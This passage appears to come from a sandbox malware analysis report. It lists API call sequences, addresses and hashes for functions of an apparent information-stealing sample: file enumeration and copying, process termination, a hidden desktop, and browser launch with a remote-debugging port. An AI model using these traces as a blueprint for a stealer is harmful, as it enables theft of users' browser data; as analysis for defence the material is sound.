                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                  • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 3860919712-2388001722
                                  • Opcode ID: a5b3972be8ec535e0b7cda0a4afcd26e0d0dc596fe26aad37c9a3634184f8f58
                                  • Instruction ID: cc88d32676edef1464af006712865cd95b4bcdc21ca4cac2a15d2d4bb95d941a
                                  • Opcode Fuzzy Hash: a5b3972be8ec535e0b7cda0a4afcd26e0d0dc596fe26aad37c9a3634184f8f58
                                  • Instruction Fuzzy Hash: DEC161719102199FCB21DF64DC49EEE77B9BF58305F004598F909A7290EE34AE98DFA0
                                  Function 00351269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00351291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003512B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003512BF
                                  • lstrlen.KERNEL32(00374CA8), ref: 003512CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003512E7
                                  • lstrcat.KERNEL32(00000000,00374CA8), ref: 003512F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0035133A
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0035135C
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 00351376
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003513AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003513D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003513E2
                                  • lstrlen.KERNEL32(00371794), ref: 003513ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035140A
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00351416
                                  • lstrlen.KERNEL32(?), ref: 00351423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351443
                                  • lstrcat.KERNEL32(00000000,?), ref: 00351451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035147A
                                  • StrCmpCA.SHLWAPI(?,00FAC6F8), ref: 003514A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003514E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00351535
                                  • StrCmpCA.SHLWAPI(?,00FAD470), ref: 00351552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00351593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003515BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003515E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00351796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003517BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003517F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0035181C
                                  • FindClose.KERNEL32(00000000), ref: 0035182B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: 7ea9b1f754419953675ad5e51b39da78b5c65542417851e83e2b83ecc6946756
                                  • Instruction ID: e6a4d35a9186ff586ad80563aaf477a43f284c1bbb2bb1b820c51490ce5b6fb5
                                  • Opcode Fuzzy Hash: 7ea9b1f754419953675ad5e51b39da78b5c65542417851e83e2b83ecc6946756
                                  • Instruction Fuzzy Hash: 61C151719102069BCB22AF64DC89EAF77F8AF54301F454528FC49AB261DB34EC59DBA0
                                  Function 00349770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00349790
                                  • lstrcat.KERNEL32(?,?), ref: 003497A0
                                  • lstrcat.KERNEL32(?,?), ref: 003497B1
                                  • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 003497C3
                                  • memset.MSVCRT ref: 003497D7
                                    • Part of subcall function 00363E70: lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00363EA5
                                    • Part of subcall function 00363E70: lstrcpy.KERNEL32(00000000,00FACBE8), ref: 00363ECF
                                    • Part of subcall function 00363E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0034134E,?,0000001A), ref: 00363ED9
                                  • wsprintfA.USER32 ref: 00349806
                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00349827
                                  • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00349844
                                    • Part of subcall function 003646A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003646B9
                                    • Part of subcall function 003646A0: Process32First.KERNEL32(00000000,00000128), ref: 003646C9
                                    • Part of subcall function 003646A0: Process32Next.KERNEL32(00000000,00000128), ref: 003646DB
                                    • Part of subcall function 003646A0: StrCmpCA.SHLWAPI(?,?), ref: 003646ED
                                    • Part of subcall function 003646A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00364702
                                    • Part of subcall function 003646A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00364711
                                    • Part of subcall function 003646A0: CloseHandle.KERNEL32(00000000), ref: 00364718
                                    • Part of subcall function 003646A0: Process32Next.KERNEL32(00000000,00000128), ref: 00364726
                                    • Part of subcall function 003646A0: CloseHandle.KERNEL32(00000000), ref: 00364731
                                  • lstrcat.KERNEL32(00000000,?), ref: 00349878
                                  • lstrcat.KERNEL32(00000000,?), ref: 00349889
                                  • lstrcat.KERNEL32(00000000,00374B60), ref: 0034989B
                                  • memset.MSVCRT ref: 003498AF
                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003498D4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00349903
                                  • StrStrA.SHLWAPI(00000000,00FADEB0), ref: 00349919
                                  • lstrcpyn.KERNEL32(005793D0,00000000,00000000), ref: 00349938
                                  • lstrlen.KERNEL32(?), ref: 0034994B
                                  • wsprintfA.USER32 ref: 0034995B
                                  • lstrcpy.KERNEL32(?,00000000), ref: 00349971
                                  • Sleep.KERNEL32(00001388), ref: 003499E7
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341557
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341579
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 0034159B
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 003415FF
                                    • Part of subcall function 003492B0: strlen.MSVCRT ref: 003492E1
                                    • Part of subcall function 003492B0: strlen.MSVCRT ref: 003492FA
                                    • Part of subcall function 003492B0: strlen.MSVCRT ref: 00349399
                                    • Part of subcall function 003492B0: strlen.MSVCRT ref: 003493E6
                                    • Part of subcall function 00364740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00364759
                                    • Part of subcall function 00364740: Process32First.KERNEL32(00000000,00000128), ref: 00364769
                                    • Part of subcall function 00364740: Process32Next.KERNEL32(00000000,00000128), ref: 0036477B
                                    • Part of subcall function 00364740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0036479C
                                    • Part of subcall function 00364740: TerminateProcess.KERNEL32(00000000,00000000), ref: 003647AB
                                    • Part of subcall function 00364740: CloseHandle.KERNEL32(00000000), ref: 003647B2
                                    • Part of subcall function 00364740: Process32Next.KERNEL32(00000000,00000128), ref: 003647C0
                                    • Part of subcall function 00364740: CloseHandle.KERNEL32(00000000), ref: 003647CB
                                  • CloseDesktop.USER32(?), ref: 00349A1C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                  • API String ID: 958055206-1862457068
                                  • Opcode ID: 8782df9a556e0dad7408507e64eb4c590c3b34e1fa984527e9a2d3afede2c000
                                  • Instruction ID: 43cf48111bdf095b979d9d3de4cd7e600123e1d522e67205ca4231a4b61d286b
                                  • Opcode Fuzzy Hash: 8782df9a556e0dad7408507e64eb4c590c3b34e1fa984527e9a2d3afede2c000
                                  • Instruction Fuzzy Hash: B5918471A50218AFDB11DF64DC49FEE77B8AF54700F508095FA0DAB281DF70AA849FA0
                                  Function 0035E210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 0035E22C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0035E243
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0035E263
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 0035E27D
                                  • wsprintfA.USER32 ref: 0035E2A2
                                  • StrCmpCA.SHLWAPI(?,0036CFEC), ref: 0035E2B4
                                  • wsprintfA.USER32 ref: 0035E2D1
                                    • Part of subcall function 0035EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0035EE12
                                  • wsprintfA.USER32 ref: 0035E2F0
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 0035E304
                                  • lstrcat.KERNEL32(?,00FAE3B0), ref: 0035E335
                                  • lstrcat.KERNEL32(?,00371794), ref: 0035E347
                                  • lstrcat.KERNEL32(?,?), ref: 0035E358
                                  • lstrcat.KERNEL32(?,00371794), ref: 0035E36A
                                  • lstrcat.KERNEL32(?,?), ref: 0035E37E
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0035E394
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E3D2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035E422
                                  • DeleteFileA.KERNEL32(?), ref: 0035E45C
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341557
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341579
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 0034159B
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 003415FF
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0035E49B
                                  • FindClose.KERNEL32(00000000), ref: 0035E4AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 1375681507-2848263008
                                  • Opcode ID: 6e9f9b119f666e9b1c13880c3f9a1a127e33f0dfb3ef446401f66b30d0d7ede0
                                  • Instruction ID: 6e31adb681b99513c25b2d2f5b91ce017834cfe69ba69c0253f2c3d41790668e
                                  • Opcode Fuzzy Hash: 6e9f9b119f666e9b1c13880c3f9a1a127e33f0dfb3ef446401f66b30d0d7ede0
                                  • Instruction Fuzzy Hash: 578192719102189BCB25EF64EC49EEF77B8BF54301F404998F90A97150EF34AA88DFA0
                                  Function 003416B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003416E2
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00341719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034176C
                                  • lstrcat.KERNEL32(00000000), ref: 00341776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003417A2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003418F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003418FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat
                                  • String ID: \*.*
                                  • API String ID: 2276651480-1173974218
                                  • Opcode ID: bf58bcb11ee7fe103ae984f66a94f2dd6aba89f190adc5f613d371a4026c0b7a
                                  • Instruction ID: 1bd27726bc36bf4459a7a3b172f654ecdcbbe021a1402accb0fe1e9b6316f4e3
                                  • Opcode Fuzzy Hash: bf58bcb11ee7fe103ae984f66a94f2dd6aba89f190adc5f613d371a4026c0b7a
                                  • Instruction Fuzzy Hash: ED81603191061A9BCB23EF68DC89AAF7BF4AF14300F454124F809AF251DB34BD95DBA1
                                  Function 0035DD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0035DD45
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0035DD4C
                                  • wsprintfA.USER32 ref: 0035DD62
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0035DD79
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0035DD9C
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 0035DDB6
                                  • wsprintfA.USER32 ref: 0035DDD4
                                  • DeleteFileA.KERNEL32(?), ref: 0035DE20
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0035DDED
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341557
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341579
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 0034159B
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 003415FF
                                    • Part of subcall function 0035D980: memset.MSVCRT ref: 0035D9A1
                                    • Part of subcall function 0035D980: memset.MSVCRT ref: 0035D9B3
                                    • Part of subcall function 0035D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0035D9DB
                                    • Part of subcall function 0035D980: lstrcpy.KERNEL32(00000000,?), ref: 0035DA0E
                                    • Part of subcall function 0035D980: lstrcat.KERNEL32(?,00000000), ref: 0035DA1C
                                    • Part of subcall function 0035D980: lstrcat.KERNEL32(?,00FADF28), ref: 0035DA36
                                    • Part of subcall function 0035D980: lstrcat.KERNEL32(?,?), ref: 0035DA4A
                                    • Part of subcall function 0035D980: lstrcat.KERNEL32(?,00FAC578), ref: 0035DA5E
                                    • Part of subcall function 0035D980: lstrcpy.KERNEL32(00000000,?), ref: 0035DA8E
                                    • Part of subcall function 0035D980: GetFileAttributesA.KERNEL32(00000000), ref: 0035DA95
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0035DE2E
                                  • FindClose.KERNEL32(00000000), ref: 0035DE3D
                                  • lstrcat.KERNEL32(?,00FAE3B0), ref: 0035DE66
                                  • lstrcat.KERNEL32(?,00FAD230), ref: 0035DE7A
                                  • lstrlen.KERNEL32(?), ref: 0035DE84
                                  • lstrlen.KERNEL32(?), ref: 0035DE92
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035DED2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 4184593125-2848263008
                                  • Opcode ID: 60dec91077e686250560adb34a39d6aa94d35e4f603588c21eaec4152261bbdf
                                  • Instruction ID: cefcd8f4eb90bd0abc1270d69c079ba28c8880f6fdd49dddbc5fde81d8eac34d
                                  • Opcode Fuzzy Hash: 60dec91077e686250560adb34a39d6aa94d35e4f603588c21eaec4152261bbdf
                                  • Instruction Fuzzy Hash: FF616771910208ABCB21EF74EC49EEE77B5BF58311F404594F909AB251DF34AA98DF60
                                  Function 0035D530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 0035D54D
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0035D564
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 0035D584
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 0035D59E
                                  • lstrcat.KERNEL32(?,00FAE3B0), ref: 0035D5E3
                                  • lstrcat.KERNEL32(?,00FAE400), ref: 0035D5F7
                                  • lstrcat.KERNEL32(?,?), ref: 0035D60B
                                  • lstrcat.KERNEL32(?,?), ref: 0035D61C
                                  • lstrcat.KERNEL32(?,00371794), ref: 0035D62E
                                  • lstrcat.KERNEL32(?,?), ref: 0035D642
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035D682
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035D6D2
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0035D737
                                  • FindClose.KERNEL32(00000000), ref: 0035D746
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 50252434-4073750446
                                  • Opcode ID: 41f7e305b9bd3d1739c6d1d72c39d04db6095e2ab783b46d91d8a713ef186867
